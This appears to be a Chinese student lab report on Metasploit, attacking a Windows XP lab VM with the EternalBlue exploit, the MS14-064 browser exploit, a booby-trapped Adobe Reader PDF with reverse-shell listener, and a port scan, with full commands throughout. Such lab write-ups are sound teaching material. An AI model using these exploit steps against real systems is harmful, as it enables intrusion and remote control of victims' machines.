20212413 2023-2024-2 《网络与系统攻防技术》实验6实验报告

20212413 2023-2024-2 《网络与系统攻防技术》实验6实验报告

1.实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

2.实验过程

攻击机:kali 2022,IP地址:192.168.154.128;
靶机:windows xp,IP地址:192.168.154.129,2.2之后由于重装xp,IP地址变为192.168.154.130;

2.1主动攻击

1.在攻击机(kali)中ping通靶机(windows xp)。
在这里插入图片描述

如果无法ping通,注意可能是由于防火墙没有关闭。

# 关闭kali防火墙
ufw disable

关闭windows xp防火墙参照下面的网址
https://g.pconline.com.cn/x/1727/17278181.html

2.在攻击机(kali)进入msf控制台,查询ms17_010漏洞相关信息。

# 进入msf控制台
msfconsole
# 搜寻模块
search ms17-010

在这里插入图片描述
在这里插入图片描述
ms17_010漏洞介绍:

永恒之蓝(ms17_010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP 、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。该漏洞通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此造成的影响极大。

3.通过ms17_010漏洞相关信息的图片,我们首先选择第三个模块查看需要配置的相关信息。

# 使用第三个模块
use 3
# 查看该漏洞模块的具体介绍信息
info
# 查看需要配置哪些信息
show missing

在这里插入图片描述
在这里插入图片描述
由于靶机(Windows xp)是32位的,所以选择一号模块。

use 1

这里需要配置远程主机的IP地址,也就是靶机的IP地址。由于攻击载荷默认是windows/meterpreter/reverse_tcp,所以无需设置,接着开始攻击。

set RHOSTS 192.168.154.129

在这里插入图片描述
4.输入截图命令。

screenshot

在这里插入图片描述
在这里插入图片描述
显示出截图,攻击成功。

2.2针对浏览器攻击

重装了一便 windows xp,IP地址变为192.168.154.130。

1.切记,攻击机(kali 2022)的防火墙关不关无所谓,但是靶机(windows xp)的防火墙必须关。
2.在靶机(kali 2022)打开msf控制台,查询ms14_064漏洞。

# 打开msf控制台
msfconsole
# 查询ms14_064漏洞相关信息
search ms14_064

在这里插入图片描述
在这里插入图片描述
ms14_064漏洞介绍:

要利用此漏洞则需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,需要该用户打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象,所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用此漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用此漏洞的 Office 文件。另外,受到破坏的网站以及接受或宿主用户提供的内容的网站可能包含可能利用此漏洞的经特殊设计的网站内容。攻击者无法强迫用户访问恶意网站。相反,攻击者必须劝诱用户访问该网站,通常是让用户单击通向攻击者站点的链接。
受影响的操作系统版本有:Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7。

3.调用0模块并配置相关信息,可以在show options中查看,显示yes的基本都是要配置的。

msf6 > use 0               # 调用0模块
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVHOST 192.168.154.128
SRVHOST => 192.168.154.128         # 用set SRVHOST命令设置本地监听的地址SRVHOST,攻击机的IP地址
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVPORT 2413
SRVPORT => 2413                    # 占用端口2413
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set URIPATH /
URIPATH => /                       # 使用set URIPATH命令设置要利用的网站的路径
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set payload windows/shell/reverse_tcp          # 用set payload命令设置反弹连接的 Shell windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set LHOST 192.168.154.128
LHOST => 192.168.154.128           # 设置反弹 Shell 回连的地址,攻击机的IP地址
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > set ALlowPowershellPrompt true
ALlowPowershellPrompt => true      # 使用set ALlowPowershellPrompt命令设置为 true,因为MSF中自带的漏洞是利用exp调用的是powershell,所以MSF的exp代码只对安装了powershell的系统生效
msf6 exploit(windows/browser/ms14_064_ole_code_execution) > exploit

在这里插入图片描述
4.将这个网址在windows xp的IE浏览器中打开。
在这里插入图片描述
5.成功获取到目标靶机系统的 Shell。
在这里插入图片描述
6.查看活跃会话并使用命令收集靶机系统的基本信息。

# 查看活跃会话
sessions -i
# 进入第一个会话
sessions -i 1
# 获取靶机系统基本信息
systeminfo
# 查看当前计算机的进程情况
tasklist /svc
# 查看计算机的开放端口
netstat -ano

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.3针对客户端攻击

1.在kali上发动针对客户端adobe reader 9.0(必须是这个版本,其他的版本这个漏洞已经修复了>_<)的攻击,下载链接:https://software.3d66.com/list/detail_2821.html。
在这里插入图片描述
2.在kali中输入msfconsole进入msf控制台,依次输入以下指令:

# 进入msf控制台
msfconsole
# 查询adobe漏洞相关信息
search adobe
# 选择攻击模块
use windows/fileformat/adobe_cooltype_sing
# 设置payload
set payload windows/meterpreter/reverse_tcp   
# 设置攻击机IP
set LHOST 192.168.154.128 
# 设置IP地址
set LPORT 2413   
# 设置生成的pdf文件的名称
set FILENAME 212413hzj.pdf   
# 攻击
exploit   

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.找到生成的212413hzj.pdf的位置并进入,将文件转移至home和靶机(windows xp)中。

cd /root/.msf4/local 
ls 
mv 212413hzj.pdf /home

在这里插入图片描述
在这里插入图片描述
4.在攻击机(kali 2022)重新打开一个msf控制台,监听该攻击机的IP地址的端口号。

# 进入msf控制台
msfconsole
# 进入监听模块
use exploit/multi/handler
# tcp反向连接
set payload windows/meterpreter/reverse_tcp
# 攻击机IP
set LHOST 192.168.154.128
# 攻击端口
set LPORT 2413
# 攻击
exploit

在这里插入图片描述
5.在靶机(Windows xp)中用adobe reader 9.0打开212413hzj.pdf,发现卡住,返回攻击机(kali 2022)成功获取靶机shell,列出目标靶机目录信息。
在这里插入图片描述
在这里插入图片描述

2.4应用辅助模块

在攻击机(kali 2022)中启动msf控制台,输入以下命令:

# 搜索与端口扫描相关的模块
search portscan      
# 使用此辅助模块扫描靶机tcp端口
use auxiliary/scanner/portscan/tcp   
# 显示要修改的参数
show options             
# 设置要扫描的靶机ip
set RHOSTS 192.168.154.130 
# 运行
run

在这里插入图片描述

3.问题及解决方案

  • 问题1:在主动攻击中,我用kali攻击windows XP无法成功,显示无法建立会话。

  • 问题1解决方案:在kali输入nmap -O -sS -T4 192.168.154.129,发现windows xp没有开放445端口。由于永恒之蓝漏洞需要445端口开放,只需打开445端口即可,详情参照这个网址http://tech.cfiex.com/tech/2022/0609/100027191.html。在这里插入图片描述

  • 问题2:在针对浏览器的攻击中,我将攻击机生成的url在靶机中打开,显示不具有执行windows脚本的权限,无法正常打开。
    在这里插入图片描述

  • 问题2解决方案:在“开始”->“运行”->输入“gpedit.msc”打开组策略,接着允许IE浏览器中二进制和脚本行为即可,可参考网址(仅供参考):https://jingyan.baidu.com/article/48b37f8de96e6c1a64648897.html。

  • 问题3:我用adobe reader打开攻击机生成的pdf显示正常打开,没有出现漏洞。

  • 问题3解决方案:由于我下载的是9.4版本的,此时这个漏洞已经被修复,只有9.0版本的漏洞没有修复。

4.学习感悟、思考等

在本次实验中,深入学习了Metasploit的基本应用方式,重点关注了三种常用的攻击方式。通过实践,掌握了主动攻击、针对浏览器的攻击以及针对客户端的攻击的思路,并尝试使用最新的类似漏洞进行攻击,以下是对实验的一些心得体会:

在主动攻击实践中,尝试了使用最新的类似漏洞进行攻击。这一过程需要对目标系统进行深入的信息收集和漏洞分析,以便找到合适的漏洞利用方式。通过Metasploit的工具和模块,成功实施了一次主动攻击,并深刻体会到了攻击者可能采取的策略和手段。

在针对浏览器的攻击中,尝试利用最新的类似漏洞对浏览器进行攻击。这一过程需要深入了解浏览器漏洞的利用方式,以及如何构建针对浏览器的攻击载荷。通过实验,我对浏览器漏洞攻击的原理和过程有了更深入的理解。

在针对客户端的攻击中,尝试利用最新的类似漏洞对客户端软件进行攻击。这一过程需要深入了解客户端软件的漏洞情况,并掌握如何利用Metasploit的模块进行攻击。通过实验,我对客户端软件漏洞利用的方式有了更清晰的认识。

在整个实验过程中,我不仅掌握了Metasploit的基本应用方式,还对攻击的思路和原理有了更深入的理解。通过实践,我意识到了信息安全的重要性,也更加深刻地理解了攻击者可能采取的策略和手段。在未来的学习和工作中,我们将继续深入学习信息安全知识,提升自身的安全意识和防御能力。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值